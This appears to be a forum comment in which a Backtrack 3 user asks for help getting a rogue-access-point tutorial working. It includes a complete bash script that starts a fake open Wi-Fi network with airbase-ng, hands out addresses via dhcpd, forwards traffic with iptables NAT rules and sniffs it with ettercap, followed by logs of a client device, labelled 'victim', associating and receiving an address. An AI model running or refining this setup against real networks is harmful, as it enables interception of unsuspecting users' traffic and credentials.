I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the pre-requisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
RTL8187L USB adapter
Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --table nat --flush
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j MASQUERADE
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/state/dhcp/dhcpd.leases'
konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
konsole -e ettercap -T -q -p -i at0 // // &
echo "1" > /proc/sys/net/ipv4/ip_forward
3:41:24 Got broadcast probe request from 00:18:DE:3C:FB:BF
13:41:24 Got broadcast probe request from 00:1D:E0:4F:B0:07
13:41:25 Got directed probe request from 00:1F:3B:00:F2:51 - "test1234"
13:41:25 Got an auth request from 00:1F:3B:00:F2:51 (open system)
13:41:25 Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234"
13:41:25 Got broadcast probe request from 00:18:DE:69:47:CD
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on at0... (Ethernet)
at0 -> 00:C0:CA:19:A0:8C 10.0.0.1 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
DHCP: [00:1F:3B:00:F2:51] DISCOVER
DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 126.96.36.199
DHCP: [00:1F:3B:00:F2:51] REQUEST 10.0.0.254
DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 188.8.131.52
Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
Sending on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
Sending on Socket/fallback/fallback-net
DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0
DHCPOFFER on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:1f:3b:00:f2:51 (victim) via at0
DHCPACK on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
DHCPINFORM from 10.0.0.254 via at0